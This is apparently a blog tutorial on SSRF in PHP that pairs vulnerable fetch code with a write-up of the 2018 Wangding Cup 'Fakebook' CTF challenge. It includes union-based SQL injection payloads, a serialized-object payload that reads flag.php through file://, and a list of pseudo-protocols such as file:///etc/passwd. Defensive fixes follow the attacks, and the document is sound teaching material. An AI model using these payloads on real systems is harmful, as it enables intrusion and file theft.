SSRF vulnerability file pseudo protocol [netding Cup 2018] fakebook1
2022-07-07 13:49:00 【A traveler】
On SSRF (Server-Side Request Forgery), see the reference: SSRF vulnerability principles, attack and defence (a very detailed summary), Zero Tap Code blog, CSDN.
SSRF (Server-Side Request Forgery) is a security vulnerability in which the attacker constructs a request that is then issued by the server itself.
In general, the target of an SSRF attack is an internal system that cannot be reached from the external network: because the request is initiated by the server, it can reach internal systems that the server is connected to but that are isolated from the Internet.
4. Functions that can produce SSRF vulnerabilities
SSRF can exist in applications written in any language; the examples below show PHP functions that may carry an SSRF vulnerability.
1. file_get_contents:
The following code uses the file_get_contents function to fetch an image from a user-specified URL, saves it to disk under a random file name, and shows it to the user.
```php
<?php
// Whatever URL the user supplies is fetched as-is: file://, php://, http://127.0.0.1 ... are all accepted
$img = "";
if (isset($_POST['url']))
{
    $content = file_get_contents($_POST['url']);
    $filename = './images/'.rand().'img1.jpg';
    file_put_contents($filename, $content);
    echo $_POST['url'];
    $img = "<img src=\"".$filename."\"/>";
}
echo $img;
?>
```
2. fsockopen():
The following code uses the fsockopen function to obtain the data (a file or HTML) at a user-specified URL. The function opens a raw TCP connection to the server through a socket and transmits raw data.
```php
<?php
function GetFile($host, $port, $link)
{
    // Host and port come straight from the caller: any internal address and port can be reached
    $fp = fsockopen($host, intval($port), $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr (error number $errno) \n";
    } else {
        // Hand-built HTTP request; $link is written into the request line unmodified
        $out  = "GET $link HTTP/1.1\r\n";
        $out .= "Host: $host\r\n";
        $out .= "Connection: Close\r\n\r\n";
        $out .= "\r\n";
        fwrite($fp, $out);
        $contents = '';
        while (!feof($fp)) {
            $contents .= fgets($fp, 1024);
        }
        fclose($fp);
        return $contents;
    }
}
?>
```
3. curl_exec():
cURL is another very common way of fetching data in PHP. Here the file or data is downloaded and stored under the "curled" folder on disk, with a random number as the file name and a ".txt" extension.
```php
<?php
if (isset($_POST['url']))
{
    $link = $_POST['url'];
    $curlobj = curl_init();
    curl_setopt($curlobj, CURLOPT_POST, 0);
    // No CURLOPT_PROTOCOLS restriction: libcurl will speak file://, dict://, gopher:// ... for this URL
    curl_setopt($curlobj, CURLOPT_URL, $link);
    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($curlobj);
    curl_close($curlobj);
    $filename = './curled/'.rand().'.txt';
    file_put_contents($filename, $result);
    echo $result;
}
?>
```
Notes
- In general, PHP does not enable the gopher wrapper for fopen.
- The gopher protocol in file_get_contents cannot be URL-encoded.
- file_get_contents has a bug with 302 redirects to gopher, which causes exploitation to fail.
- In curl/libcurl 7.43 the gopher protocol has a bug (%00 truncation); 7.49 was tested and works.
- curl_exec() does not follow redirects by default.
- file_get_contents() supports the php://input protocol.
5. URL pseudo-protocols in SSRF
Once an SSRF vulnerability is found, the first thing to do is to test which URL pseudo-protocols are available:
- file:/// reads file contents from the file system, e.g. file:///etc/passwd
- dict:// dictionary server protocol, accesses dictionary resources, e.g. dict:///ip:6739/info:
- sftp:// SSH file transfer protocol, or secure file transfer protocol
- ldap:// lightweight directory access protocol
- tftp:// trivial file transfer protocol
- gopher:// distributed document delivery service; gopherus can be used to generate payloads
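The three fetch functions above and this protocol list share one root cause: the URL is passed to the fetch layer without any policy on scheme or destination. The following is an added example (not code from this post or from the referenced blog) of the checks a defender would put in front of such a fetch: a scheme allow-list, resolution of the host with a refusal of private, loopback and reserved ranges, libcurl's own protocol restriction, no redirect following, and pinning the connection to the address that was checked. It assumes PHP 7+ with the curl extension; the sample URLs at the bottom are constructed (203.0.113.10 is a documentation address, chosen so the demo needs no DNS).

```php
<?php
// Added example, not from the original post. Assumes PHP 7+ with ext-curl.

// Returns [host, port, ip] for a URL the policy allows, otherwise throws with the reason.
function assertPublicHttpUrl(string $url): array
{
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        throw new InvalidArgumentException('malformed URL');
    }
    $scheme = strtolower($p['scheme']);
    // Scheme allow-list: file, dict, gopher, php, ftp, ldap, tftp ... are all refused here.
    if ($scheme !== 'http' && $scheme !== 'https') {
        throw new InvalidArgumentException("scheme not allowed: $scheme");
    }
    $host = trim($p['host'], '[]');
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    // Resolve once and judge the address, not only the name.
    $ip = filter_var($host, FILTER_VALIDATE_IP) !== false ? $host : gethostbyname($host);
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) { // gethostbyname() returns the name unchanged on failure
        throw new RuntimeException("cannot resolve host: $host");
    }
    // Loopback, link-local, RFC 1918 and other reserved ranges are exactly the
    // "internal systems" an SSRF is used to reach; filter_var knows these ranges.
    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
        throw new RuntimeException("address $ip is private or reserved");
    }
    return [$host, $port, $ip];
}

function safeFetch(string $url): string
{
    [$host, $port, $ip] = assertPublicHttpUrl($url);
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_FOLLOWLOCATION  => false,      // a 302 to gopher://, file:// or 127.0.0.1 is not followed
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_RESOLVE         => ["$host:$port:$ip"], // pin the checked address (defeats DNS rebinding)
        CURLOPT_CONNECTTIMEOUT  => 5,
        CURLOPT_TIMEOUT         => 10,
    ]);
    $body = curl_exec($ch);
    $err  = curl_error($ch);
    curl_close($ch);
    if ($body === false) {
        throw new RuntimeException("fetch failed: $err");
    }
    return $body;
}

// Constructed sample inputs: the pseudo-protocols listed above plus literal-IP targets.
$samples = [
    'file:///etc/passwd',
    'dict://127.0.0.1:2628/',
    'gopher://127.0.0.1:70/',
    'php://input',
    'http://127.0.0.1/admin',
    'http://192.168.1.10/',
    'http://203.0.113.10/index.html',
];
foreach ($samples as $u) {
    try {
        [$h, $pt, $ip] = assertPublicHttpUrl($u);
        echo "$u -> allowed ($ip:$pt)\n";
    } catch (Exception $e) {
        echo "$u -> refused: {$e->getMessage()}\n";
    }
}
```

Only the last sample passes the policy; everything else is refused before a socket is opened. Note that the check is done on the resolved address and then pinned with CURLOPT_RESOLVE, because a name that resolves to a public address at check time and to 127.0.0.1 at connect time would otherwise slip through.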
The knowledge points above come from the reference given at the top of the page.
Now the worked example, starting from Fakebook:
References: [WANGDING Cup 2018] Fakebook, Programmer's Little Chicken blog, CSDN
[WANGDING Cup 2018] Fakebook (SSRF vulnerability), Tian Wen / Herbert555 blog, CSDN
First register, then log in, find the user we just registered and click into it.
The URL contains a no parameter; try SQL injection:
Use a comment to bypass the space filter: union/**/select
?no=-1 union/**/select 1,database(),3,4#   (database name) gives 'fakebook'
?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'#   (table names) gives 'users'
?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'#   (columns) gives 'no,username,data'
This is a union-based injection; spaces are filtered, so /**/ is used in their place. Routine enumeration then turns up something serialized:
2. Directory scanning finds robots.txt and also flag.php;
Opening robots.txt reveals a source-code backup;
Analysis of the source code:
```php
<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    // The SSRF sink: curl_exec() with no CURLOPT_PROTOCOLS restriction, so file:// is accepted
    function get($url)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);
        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    // Only checked at registration; an object restored from the database never passes through here
    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}
```
In get() we find curl_exec, the function associated with the SSRF. Combined with flag.php, the file: protocol can be used, and the page source of a user's profile shows the data segment in encoded form;
So change blog to file:///var/www/html/flag.php
You can serialize it yourself, or directly modify the serialized value found earlier: change the length to 29 and replace blog:
Payload:
?no=0 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:19;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
What I don't understand here is why the serialized data goes in the 4th position??
Then, looking at the page source, the data field is base64-encoded; just decode it.
There is another unexpected method, namely load_file(); see the reference for details.
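The chain in this challenge is three defects working together: the no parameter is concatenated into SQL, the data column is passed to unserialize(), and get() hands the resulting blog value to curl with no protocol restriction, so the isValidBlog() check that ran at registration is simply never reached. The following is an added example (not the challenge's code) of the same profile path with each link fixed: a prepared statement for no, JSON instead of PHP serialization for the stored record, and a fetch that re-validates the URL at use time and restricts libcurl to HTTP(S). It assumes PHP 7.1+ with pdo_sqlite and ext-curl; the table layout (no, username, data) is the one enumerated in the writeup, and the rows inserted are constructed demo data. The regex is the challenge's own, reused unchanged.

```php
<?php
// Added example, not the challenge's code. Assumes PHP 7.1+ with pdo_sqlite and ext-curl.

final class UserInfo
{
    public $name;
    public $age;
    public $blog;

    public function __construct(string $name, int $age, string $blog)
    {
        $this->name = $name;
        $this->age  = $age;
        $this->blog = $blog;
    }

    // Same regex as the challenge, but now applied every time the value is about to be used.
    public static function isValidBlog(string $blog): bool
    {
        return (bool)preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

    // The regex allows a scheme-less value; require an explicit http(s):// so curl never guesses.
    public static function isFetchable(string $blog): bool
    {
        return self::isValidBlog($blog) && preg_match('#^https?://#i', $blog) === 1;
    }

    public function getBlogContents()
    {
        if (!self::isFetchable($this->blog)) {
            return false;                       // file://, dict://, gopher://, php:// ... never reach curl
        }
        $ch = curl_init($this->blog);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => false,
            CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS, // defence in depth at the libcurl layer
            CURLOPT_TIMEOUT        => 10,
        ]);
        $out = curl_exec($ch);
        curl_close($ch);
        return $out;
    }

    // JSON instead of serialize(): decoding yields plain data, no object graph, no magic methods.
    public static function fromJson(string $json): ?UserInfo
    {
        $d = json_decode($json, true);
        if (!is_array($d) || !isset($d['name'], $d['age'], $d['blog'])) {
            return null;
        }
        return new UserInfo((string)$d['name'], (int)$d['age'], (string)$d['blog']);
    }

    public function toJson(): string
    {
        return json_encode(['name' => $this->name, 'age' => $this->age, 'blog' => $this->blog]);
    }
}

function loadUser(PDO $pdo, string $no): ?UserInfo
{
    // Parameterised query: "-1 union/**/select ..." is compared as a value, never parsed as SQL.
    $stmt = $pdo->prepare('SELECT data FROM users WHERE no = ?');
    $stmt->execute([$no]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? UserInfo::fromJson($row['data']) : null;
}

// --- constructed demo data (in-memory SQLite stands in for the challenge's MySQL) ---
$pdo = new PDO('sqlite::memory:');
$pdo->exec('CREATE TABLE users (no INTEGER PRIMARY KEY, username TEXT, data TEXT)');
$ins = $pdo->prepare('INSERT INTO users (no, username, data) VALUES (?, ?, ?)');
$ins->execute([1, 'alice', (new UserInfo('alice', 19, 'http://example.com/'))->toJson()]);
// A record whose blog field already holds the value from the payload above
$ins->execute([2, 'evil', (new UserInfo('evil', 19, 'file:///var/www/html/flag.php'))->toJson()]);

foreach (['1', '2', '-1 union/**/select 1,2,3,4'] as $no) {
    $u = loadUser($pdo, $no);
    if ($u === null) {
        echo "no=$no: no such user\n";
        continue;
    }
    $verdict = UserInfo::isFetchable($u->blog) ? 'would be fetched' : 'refused at use time';
    echo "no=$no: blog {$u->blog} -> $verdict\n";
}
```

Running it shows no=1 would be fetched, no=2 refused at use time, and the union string returning no row at all. The important design point is that the check moved from registration into getBlogContents(): a value that arrives through any other path (SQL injection, a direct database edit, an old record) is judged at the moment it is used, and CURLOPT_PROTOCOLS backs that up even if the regex were ever loosened.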